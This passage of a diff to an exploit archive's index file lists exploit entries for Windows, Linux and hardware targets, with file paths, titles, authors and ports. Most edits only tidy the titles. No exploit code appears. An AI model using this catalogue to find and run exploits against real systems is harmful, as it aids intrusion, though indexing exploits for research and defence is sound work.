(3)",2014-02-02,rebel,lin_x86-64,local,0 -31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 +31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) (ASLR + DEP Bypass)",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Privilege Escalation",2014-02-06,LiquidWorm,windows,local,0 31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31574,platforms/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Privilege Escalation",2014-02-11,"Piotr Szerman",arm,local,0 @@ -8989,7 +8989,7 @@ id,file,description,date,author,platform,type,port 40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0 40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0 40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0 -40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,windows,local,0 +40442,platforms/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,windows,local,0 40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0 @@ -9253,6 +9253,7 @@ id,file,description,date,author,platform,type,port 42665,platforms/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation",2017-09-12,mr_me,windows,local,0 42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0 42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0 +42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -9543,7 +9544,7 @@ id,file,description,date,author,platform,type,port 868,platforms/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote,0 875,platforms/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 -879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 +879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit",2005-03-14,lammat,multiple,remote,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 @@ -9556,7 +9557,7 @@ id,file,description,date,author,platform,type,port 940,platforms/linux/remote/940.c,"Sumus 0.2.2 - httpd Remote Buffer Overflow",2005-04-14,vade79,linux,remote,81 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 -945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Request Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 +945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server - GET Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,80 947,platforms/windows/remote/947.pl,"Microsoft Exchange Server - Remote Code Execution (MS05-021)",2005-04-19,"Evgeny Pinchuk",windows,remote,25 949,platforms/windows/remote/949.c,"PMSoftware Simple Web Server 1.0 - Remote Stack Overflow",2005-04-20,c0d3r,windows,remote,80 952,platforms/windows/remote/952.pl,"MailEnable Enterprise & Professional - https Remote Buffer Overflow",2005-04-25,CorryL,windows,remote,8080 @@ -9706,7 +9707,7 @@ id,file,description,date,author,platform,type,port 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 -1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 +1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - GET Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 @@ -9936,9 +9937,9 @@ id,file,description,date,author,platform,type,port 3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote,0 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0 -3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 +3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080 3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0 -3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080 +3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080 3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113 3927,platforms/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote,0 3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote,0 @@ -10018,7 +10019,7 @@ id,file,description,date,author,platform,type,port 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 -4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Request Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 +4280,platforms/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 4283,platforms/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 4287,platforms/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 @@ -10127,7 +10128,7 @@ id,file,description,date,author,platform,type,port 4923,platforms/windows/remote/4923.txt,"Miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)",2008-01-18,"Marcin Kozlowski",windows,remote,0 -4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 +4941,platforms/hardware/remote/4941.txt,"Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0 @@ -10344,7 +10345,7 @@ id,file,description,date,author,platform,type,port 7630,platforms/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,windows,remote,0 7701,platforms/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,linux,remote,445 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,windows,remote,0 -7712,platforms/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 +7712,platforms/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0 7747,platforms/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0 7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0 @@ -10423,10 +10424,10 @@ id,file,description,date,author,platform,type,port 8321,platforms/windows/remote/8321.py,"Amaya 11.1 - W3C Editor/Browser (defer) Stack Overflow",2009-03-30,Encrypt3d.M!nd,windows,remote,0 8332,platforms/windows/remote/8332.txt,"PrecisionID Datamatrix - ActiveX Arbitrary File Overwrite",2009-03-31,DSecRG,windows,remote,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0 -8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 +8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - GET Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 -8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 +8354,platforms/windows/remote/8354.py,"XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal)",2009-04-06,n00b,windows,remote,80 8359,platforms/hardware/remote/8359.py,"Pirelli Discus DRG A225 wifi router - WPA2PSK Default Algorithm Exploit",2009-04-06,j0rgan,hardware,remote,0 8363,platforms/windows/remote/8363.py,"XBMC 8.10 - (HEAD) Remote Buffer Overflow (SEH)",2009-04-07,His0k4,windows,remote,80 8368,platforms/windows/remote/8368.txt,"peterConnects Web Server - Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 @@ -10516,7 +10517,7 @@ id,file,description,date,author,platform,type,port 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 -9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0 +9498,platforms/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",hardware,remote,0 9500,platforms/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0 @@ -10529,7 +10530,7 @@ id,file,description,date,author,platform,type,port 9615,platforms/windows/remote/9615.jar,"Pidgin MSN 2.5.8 - Remote Code Execution",2009-09-09,"Pierre Nogues",windows,remote,0 9638,platforms/windows/remote/9638.txt,"Kolibri+ Web Server 2 - Source Code Disclosure",2009-09-11,SkuLL-HackeR,windows,remote,0 9643,platforms/windows/remote/9643.txt,"kolibri+ Web Server 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 -9644,platforms/windows/remote/9644.py,"Kolibri+ Web Server 2 - GET Request Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80 +9644,platforms/windows/remote/9644.py,"Kolibri+ Web Server 2 - GET Remote Overwrite (SEH)",2009-09-11,blake,windows,remote,80 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform Remote Code Execution via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 @@ -10538,9 +10539,9 @@ id,file,description,date,author,platform,type,port 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure",2009-09-14,"ThE g0bL!N",windows,remote,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow",2009-09-14,dmc,windows,remote,143 9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow",2009-09-14,dmc,windows,remote,0 -9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660 +9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH)",2009-09-15,blake,windows,remote,6660 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 - '/Scripts' Access Restriction Bypass",2009-09-15,"Usman Saeed",windows,remote,0 -9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660 +9690,platforms/windows/remote/9690.py,"BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH)",2009-09-15,hack4love,windows,remote,6660 9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Source Code Disclosure",2009-09-16,Dr_IDE,windows,remote,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 - IMAP 'connect()' ActiveX Buffer Overflow",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 - (AddAttachment) Remote Buffer Overflow",2009-09-17,bmgsec,windows,remote,0 @@ -10634,7 +10635,7 @@ id,file,description,date,author,platform,type,port 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login - Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0 10037,platforms/cgi/remote/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,remote,0 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 -10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 +10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - GET Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - Cross-Site Scripting",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - 'imgsrv.exe' Buffer Overflow",2009-10-07,blake,windows,remote,1235 @@ -11063,7 +11064,7 @@ id,file,description,date,author,platform,type,port 16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0 16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 -16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 +16388,platforms/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 @@ -11289,7 +11290,7 @@ id,file,description,date,author,platform,type,port 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-11-05,Metasploit,windows,remote,0 16690,platforms/windows/remote/16690.rb,"QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow (Metasploit)",2010-07-12,Metasploit,windows,remote,80 -16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 +16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,3128 16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,12203 @@ -11449,7 +11450,7 @@ id,file,description,date,author,platform,type,port 16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0 -16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0 +16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0 16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0 16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0 @@ -11765,7 +11766,7 @@ id,file,description,date,author,platform,type,port 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 - SVG Browser Java Code Execution (Metasploit)",2012-05-19,Metasploit,multiple,remote,0 18893,platforms/hardware/remote/18893.py,"HP VSA - Remote Command Execution",2012-02-17,"Nicolas Gregoire",hardware,remote,0 18898,platforms/php/remote/18898.rb,"Active Collab 'chat module' < 2.3.8 - Remote PHP Code Injection (Metasploit)",2012-05-19,Metasploit,php,remote,0 -18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Request Buffer Overflow (Metasploit)",2012-05-19,Metasploit,windows,remote,0 +18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit)",2012-05-19,Metasploit,windows,remote,0 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,hardware,remote,0 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,windows,remote,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry 'sprintf()' Buffer Overflow (Metasploit)",2012-05-25,Metasploit,windows,remote,0 @@ -11781,7 +11782,7 @@ id,file,description,date,author,platform,type,port 19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,windows,remote,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,windows,remote,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0 -19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug exploit",1988-08-01,anonymous,linux,remote,0 +19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug Exploit",1988-08-01,anonymous,linux,remote,0 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0 @@ -11993,7 +11994,7 @@ id,file,description,date,author,platform,type,port 19722,platforms/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - lpd Vulnerabilities",2000-01-11,anonymous,unix,remote,0 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0 -19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0 +19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail GET Exploit",2000-01-17,"Greg Hoglund",windows,remote,0 19731,platforms/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote,0 @@ -12894,8 +12895,8 @@ id,file,description,date,author,platform,type,port 22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 - Admin Interface Cross-Site Scripting",2002-11-08,euronymous,cgi,remote,0 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 - File Disclosure",2002-11-08,"Tamer Sahin",windows,remote,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 -22012,platforms/linux/remote/22012.c,"Light HTTPD 0.1 - GET Request Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0 -22013,platforms/linux/remote/22013.c,"Light HTTPD 0.1 - GET Request Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0 +22012,platforms/linux/remote/22012.c,"Light HTTPD 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0 +22013,platforms/linux/remote/22013.c,"Light HTTPD 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0 22018,platforms/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote,0 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,multiple,remote,0 @@ -12964,7 +12965,7 @@ id,file,description,date,author,platform,type,port 22224,platforms/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",multiple,remote,0 22226,platforms/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",windows,remote,0 22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0 -22236,platforms/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote,0 +22236,platforms/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File 